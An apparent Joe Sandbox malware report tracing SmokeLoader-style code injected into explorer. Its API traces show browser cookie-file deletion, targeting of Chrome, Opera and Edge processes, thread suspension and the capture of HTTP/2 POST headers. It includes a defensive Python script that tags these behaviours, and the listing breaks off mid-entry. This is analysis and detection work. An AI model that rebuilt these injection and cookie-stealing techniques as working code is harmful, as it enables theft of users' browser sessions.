                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                      • String ID: *.*$Cookies*
                                                      • API String ID: 4256701249-3228320225
                                                      • Opcode ID: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                                      • Instruction ID: 8b79dbc0752a28f5ad1f1006910a533587f018e208c1d15e1b3a33415b5554fa
                                                      • Opcode Fuzzy Hash: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                                      • Instruction Fuzzy Hash: 832167712043169BD710BB60AC84ABF7BDCBF89795F040529FAC5D3241EB78DD464BA2

                                                      Control-flow Graph (executed / not-executed block colouring not captured)
                                                      • Blocks: 463 814d8-81527 call 813fe, call 81000, wsprintfW, FindFirstFileW; 468 81599-815a6 call 81011; 469 81529; 471 8152b-81530; 473 8157e-8158c FindNextFileW; 474 81532-8153d call 813d7; 475 8158e-81595 FindClose; 478 8153f-81565 call 81000, wsprintfW; 481 81570-81579 DeleteFileW, call 81011; 482 81567-8156a SetFileAttributesW
                                                      • Edges: 463->468, 463->469, 469->471, 471->473, 471->474, 473->471, 473->475, 474->473, 474->478, 475->468, 478->481, 478->482, 481->473, 482->481
                                                      APIs
                                                        • Part of subcall function 000813FE: wsprintfW.USER32 ref: 0008142A
                                                        • Part of subcall function 000813FE: FindFirstFileW.KERNEL32(00000000,?), ref: 00081439
                                                        • Part of subcall function 000813FE: wsprintfW.USER32 ref: 00081476
                                                        • Part of subcall function 000813FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                                        • Part of subcall function 000813FE: FindNextFileW.KERNEL32(00000000,00000010), ref: 000814AF
                                                        • Part of subcall function 000813FE: FindClose.KERNEL32(00000000), ref: 000814BA
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • wsprintfW.USER32 ref: 0008150D
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                      • wsprintfW.USER32 ref: 00081557
                                                      • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                      • DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                      • FindClose.KERNEL32(00000000), ref: 0008158F
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                      • String ID: %s%s$*.*
                                                      • API String ID: 2055899612-705776850
                                                      • Opcode ID: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                                      • Instruction ID: 5bb26f6c1dc7bd09f101a8d25e391cda339d68d8b89c612bbdf1b72f2cef919b
                                                      • Opcode Fuzzy Hash: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                                      • Instruction Fuzzy Hash: 1F11B7312007055BE310BB649C49AEF7BDCFF95755F000519FED2922D3EB788A4687A6
                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • wsprintfW.USER32 ref: 0008142A
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00081439
                                                      • wsprintfW.USER32 ref: 00081476
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                        • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                                        • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                                        • Part of subcall function 000814D8: DeleteFileW.KERNEL32(00000000), ref: 00081571
                                                        • Part of subcall function 000814D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00081584
                                                        • Part of subcall function 000814D8: FindClose.KERNEL32(00000000), ref: 0008158F
                                                      • RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000814AF
                                                      • FindClose.KERNEL32(00000000), ref: 000814BA
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                      • String ID: %s%s$%s%s\$*.*
                                                      • API String ID: 2055899612-4093207852
                                                      • Opcode ID: fc9ea9a760a63c4b6c0563a6d2535c86a417247367b891c16f671a48bc96e344
                                                      • Instruction ID: 7a152c0ea108eeacf04616a90babe5037b3a522f46ac4564a06091ccefb20d83
                                                      • Opcode Fuzzy Hash: fc9ea9a760a63c4b6c0563a6d2535c86a417247367b891c16f671a48bc96e344
                                                      • Instruction Fuzzy Hash: D21190302043416BE710BB25EC49AFF76DCFFD5355F000529FAC192292DB79484A8B62
                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                                      • lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                                      • wsprintfA.USER32 ref: 00081205
                                                      • CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                      • String ID: %02X
                                                      • API String ID: 3341110664-436463671
                                                      • Opcode ID: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                                      • Instruction ID: 298286c9a9371f5bd7e7a063f8446572b34c6f4efce2401be2fb8dd3adceacc5
                                                      • Opcode Fuzzy Hash: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                                      • Instruction Fuzzy Hash: 62113D71900109BFEB119F95EC88EEFBBBCFB44701F104065F645E2150DB754E559B60
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 000816D9
                                                      • GetCurrentThreadId.KERNEL32 ref: 000816E1
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008171E
                                                      • SuspendThread.KERNEL32(00000000), ref: 0008172E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0008173D
                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008174D
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081758
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                      • String ID:
                                                      • API String ID: 1467098526-0
                                                      • Opcode ID: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                                      • Instruction ID: 9f8a97b458fd6a1e1d725efe8f807f36da717ca79b52438bb26f371cecc15507
                                                      • Opcode Fuzzy Hash: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                                      • Instruction Fuzzy Hash: 53113C72408212EBE711AF60AC48AAFBFF8FF85711F05041DF6C592150D738894A9FA7
                                                      APIs
                                                      • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                                      • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                                      • StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                                        • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                        • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                      • String ID: NetworkService
                                                      • API String ID: 1656241333-2019834739
                                                      • Opcode ID: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                                      • Instruction ID: 2a2cb19856545ee97dced0d83344d7303902199a923c80ef4bb46b56f5b20446
                                                      • Opcode Fuzzy Hash: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                                      • Instruction Fuzzy Hash: EC01D471300346BFE7247B219C49FAB3A9DFFD8392F014029F68AD6142DAB59C808B20
                                                      APIs
                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00081E83
                                                      • LoadLibraryA.KERNEL32(?), ref: 00081EAB
                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00081ED8
                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081F29
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                      • String ID:
                                                      • API String ID: 3827878703-0
                                                      • Opcode ID: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                                      • Instruction ID: 568ebf0d0beaab3ca419b44d6bddffa2e7cdb8569d387974d06ed25d6f468c67
                                                      • Opcode Fuzzy Hash: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                                      • Instruction Fuzzy Hash: A4317A72700216ABCB689F29CC84BA6B7ECFF15354B15456CE986CB201D735E846CBA4
                                                      APIs
                                                      • StrStrIA.SHLWAPI(chrome.exe|opera.exe|msedge.exe,?), ref: 00082EB4
                                                        • Part of subcall function 00082E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                                        • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                                        • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                                        • Part of subcall function 00082E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                                      Strings
                                                      • chrome.exe|opera.exe|msedge.exe, xrefs: 00082EAB
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process$InformationQuery$Open
                                                      • String ID: chrome.exe|opera.exe|msedge.exe
                                                      • API String ID: 4117927671-3743313796
                                                      • Opcode ID: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                                      • Instruction ID: 74462bb72cca3f48bcbab1f2b981006a3a1547241742571b3dc85306c1ef6728
                                                      • Opcode Fuzzy Hash: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                                      • Instruction Fuzzy Hash: C6D0A932300222072B2C367A6C0A86FA48DEBC2A62302013EF982C7240EA908C0343A4
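The functions above are recorded only as API names and raw hexadecimal arguments: the OpenProcess / WriteProcessMemory / CreateRemoteThread injector at 0008201A, the CryptCreateHash routine at 000811A9, the Toolhelp32 thread suspender at 000816D9, and the two browser-targeting functions at 00082E27 and 00082EB4. The following Python script is an added example, not Joe Sandbox or SmokeLoader code: it parses entries in this listing format, names the argument constants a reader otherwise has to look up (PROCESS_ALL_ACCESS 0x1FFFFF, PROCESS_QUERY_LIMITED_INFORMATION 0x1000, PROCESSINFOCLASS 0x34 ProcessMitigationPolicy and 0x3C ProcessCommandLineInformation, TH32CS_SNAPTHREAD, CALG_MD5 0x8003) and tags each function with a behaviour rule. SAMPLE is a constructed excerpt copied from the listing above; the rule names and their API sets are this example's own heuristics, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox per-function API listings and tag SmokeLoader-style behaviours.
Added example for this report, not Joe Sandbox or SmokeLoader code; SAMPLE is a
constructed excerpt of the listing and the rule names below are this example's own."""
import re

SAMPLE = """\
APIs
• OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,756F3E2E), ref: 0008201A
• NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00082055
• ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821AE
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821D8
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000821EB
• String ID: atan$ntdll$opera_shared_counter
APIs
• GetCurrentThreadId.KERNEL32 ref: 000816E1
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
• OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008171E
• SuspendThread.KERNEL32(00000000), ref: 0008172E
• String ID:
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
  • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
• NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
• StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
• String ID: NetworkService
APIs
• CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
• CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
• String ID: %02X
"""

# A call line: optional "Part of subcall function X: " prefix, Api.MODULE(args), ref: address.
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+: )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$")
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")  # Joe prints numeric arguments zero-padded to 8 hex digits


def parse_entries(text):
    """Split the listing at each "APIs" header and return one record per function."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "strings": []}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur["calls"].append({"api": m["api"], "module": m["mod"], "args": args,
                                 "ref": int(m["ref"], 16), "subcall": m["sub"] is not None})
            continue
        m = STR_RE.match(line)
        if m and m["ids"]:
            cur["strings"] = m["ids"].split("$")  # Joe joins a function's strings with '$'
    return entries


# (api, argument index) -> constants worth naming in this listing (Windows SDK / PROCESSINFOCLASS).
KNOWN_ARGS = {
    ("OpenProcess", 0): {0x1FFFFF: "PROCESS_ALL_ACCESS", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"},
    ("NtSetInformationProcess", 1): {0x34: "ProcessMitigationPolicy"},
    ("NtQueryInformationProcess", 1): {0x3C: "ProcessCommandLineInformation"},
    ("CreateToolhelp32Snapshot", 0): {0x4: "TH32CS_SNAPTHREAD"},
    ("CryptCreateHash", 1): {0x8003: "CALG_MD5"},
}


def decode_arg(call, index):
    """Name a numeric argument when it is a known constant; otherwise return it as printed."""
    if index >= len(call["args"]):
        return None
    raw = call["args"][index]
    if not HEX8.fullmatch(raw):  # '?' (unknown) or a string literal such as NetworkService
        return raw
    return KNOWN_ARGS.get((call["api"], index), {}).get(int(raw, 16), raw)


# A rule fires when every listed API is called directly by the function (subcall lines excluded).
RULES = {
    "remote_code_injection": {"OpenProcess", "WriteProcessMemory", "CreateRemoteThread"},
    "suspend_other_threads": {"CreateToolhelp32Snapshot", "OpenThread", "SuspendThread"},
    "browser_process_targeting": {"NtQueryInformationProcess", "StrStrIW"},
    "capi_md5_fingerprint": {"CryptCreateHash", "CryptGetHashParam"},
}


def classify(entry):
    """Return the set of rule names matching one parsed function."""
    apis = {c["api"] for c in entry["calls"] if not c["subcall"]}
    hits = {name for name, needed in RULES.items() if needed <= apis}
    # Constant-aware refinements: the hash rule needs CALG_MD5; the NetworkService string
    # marks the browser's network-service utility process as the injection target.
    if "capi_md5_fingerprint" in hits and not any(
            c["api"] == "CryptCreateHash" and decode_arg(c, 1) == "CALG_MD5" for c in entry["calls"]):
        hits.discard("capi_md5_fingerprint")
    if any("NetworkService" in s for s in entry["strings"]):
        hits.add("browser_process_targeting")
    return hits


def summarize(text):
    """Map each function, keyed by the address of its first call site, to its sorted rule hits."""
    return {e["calls"][0]["ref"]: sorted(classify(e)) for e in parse_entries(text) if e["calls"]}
```

To run it over a whole report, replace SAMPLE with the saved listing text; only the "APIs" and "String ID" lines are consumed, so the fuzzy-hash and memory-dump lines can stay in place. The "Part of subcall function" lines are parsed but excluded from rule matching, otherwise the heap-allocation helper at 00081000 would make every caller look like it allocates memory itself.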

                                                      Control-flow Graph (executed / not-executed block colouring not captured)
                                                      • Blocks: 222 82974-829a2; 223 829a8-829aa; 224 82b65-82b6d; 225 829b0-829b9 call 81765; 228 829bf-829c1; 229 829c7-829c9; 230 829cf-829df call 81141; 233 829e5-82a0d call 81000 * 3; 240 82a11 call 8104c; 241 82a16-82a30 call 8285f; 244 82a4c-82a64 call 8285f; 245 82a32-82a42 call 8285f; 251 82a6e-82a85 call 8285f; 252 82a66-82a6c lstrcat; 250 82a44-82a4a lstrcat; 255 82a8f-82ab2 RtlZeroMemory, call 8285f; 256 82a87-82a8d lstrcat; 259 82ac3; 260 82ab4-82ac1 StrToIntA; 261 82ac7-82ac9; 262 82acb-82ace; 263 82b42-82b64 call 8105d, call 81011 * 3; 265 82ad0-82ad7; 267 82ad9-82adf; 269 82ae5 call 8104c; 271 82aea-82b29 wnsprintfA, call 828ad; 277 82b2b-82b2d lstrcat; 278 82b2f-82b3e lstrcat * 2
                                                      • Edges: 222->223, 222->224, 223->224, 223->225, 225->224, 225->228, 228->224, 228->229, 229->224, 229->230, 230->224, 230->233, 233->240, 240->241, 241->244, 241->245, 244->251, 244->252, 245->244, 245->250, 250->244, 251->255, 251->256, 252->251, 255->259, 255->260, 256->255, 259->261, 260->261, 261->262, 261->263, 262->263, 262->265, 263->224, 265->263, 265->267, 267->269, 269->271, 271->277, 271->278, 277->278, 278->263
                                                      APIs
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                        • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                                        • Part of subcall function 0008285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 000828A2
                                                      • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00082A4A
                                                      • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00082A6C
                                                      • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00082A8D
                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082A96
                                                      • StrToIntA.SHLWAPI(00000000), ref: 00082AB9
                                                      • wnsprintfA.SHLWAPI ref: 00082B0D
                                                      • lstrcat.KERNEL32(00000000,?), ref: 00082B2D
                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 00082B35
                                                      • lstrcat.KERNEL32(00000000,?), ref: 00082B3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                                      • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                                      • API String ID: 2605944266-950501416
                                                      • Opcode ID: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                                      • Instruction ID: d8dd03a251d738af89b9767004e5c399ca865ed0c4bb03e024ab117a7b61717e
                                                      • Opcode Fuzzy Hash: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                                      • Instruction Fuzzy Hash: BF516D706043419BDB19BF24C984AAEBBDABF98304F04081DF8C597293DB78DC468B66

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                                      • StrToIntA.SHLWAPI(?), ref: 00083024
                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                                      • wsprintfA.USER32 ref: 000830B9
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                                      • lstrcat.KERNEL32(?,{:!:}), ref: 000830F8
                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,00086038), ref: 00083109
                                                      • RtlMoveMemory.NTDLL(00000000), ref: 00083112
                                                        • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                                        • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                      • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                      • API String ID: 2886538537-1627781280
                                                      • Opcode ID: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                                      • Instruction ID: 0ab628cf7cdd2d7bd700d5d11cd162a6a2ce618acf256a36fb072680de120010
                                                      • Opcode Fuzzy Hash: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                                      • Instruction Fuzzy Hash: 243193313002466BD704BB248C59BAF36AEBFC4B41F00443CFAC297283DA7999468BA1

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                        • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                        • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                        • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                                        • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                      • Sleep.KERNEL32(000003E8,?,00000000,00000001,?,?,00083839,?,00083C53,00000001), ref: 00083731
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083752
                                                      • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00083764
                                                        • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                                        • Part of subcall function 000815BE: FindFirstFileW.KERNEL32(00000000,?), ref: 000815F7
                                                        • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                                        • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                                        • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                                        • Part of subcall function 000815BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                                        • Part of subcall function 000815BE: FindClose.KERNEL32(00000000), ref: 000816AB
                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0008377A
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083783
                                                      • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0008378F
                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 000837A3
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000837AC
                                                      • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 000837B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                      • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                      • API String ID: 909495591-1175993956
                                                      • Opcode ID: cc35f3566ee9868297273f9fa43087e24711ceae7b2c1c8a52be48be319707da
                                                      • Instruction ID: ec7ff4d470ff25c577ac56c1694f62454c323dd216fa13f948d3d90517649557
                                                      • Opcode Fuzzy Hash: cc35f3566ee9868297273f9fa43087e24711ceae7b2c1c8a52be48be319707da
                                                      • Instruction Fuzzy Hash: 7011027034571632F22033615C82FEF258DFFA6BA1F100024F2C56A2C2DED89E0247AA

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                                        • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                                        • Part of subcall function 00081363: CloseHandle.KERNEL32(00000000), ref: 000813CB
                                                        • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                                        • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,0008382F,?,00083C53,00000001), ref: 000835FA
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083613
                                                      • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00083623
                                                      • wsprintfW.USER32 ref: 00083644
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                                        • Part of subcall function 000814D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0008151C
                                                        • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
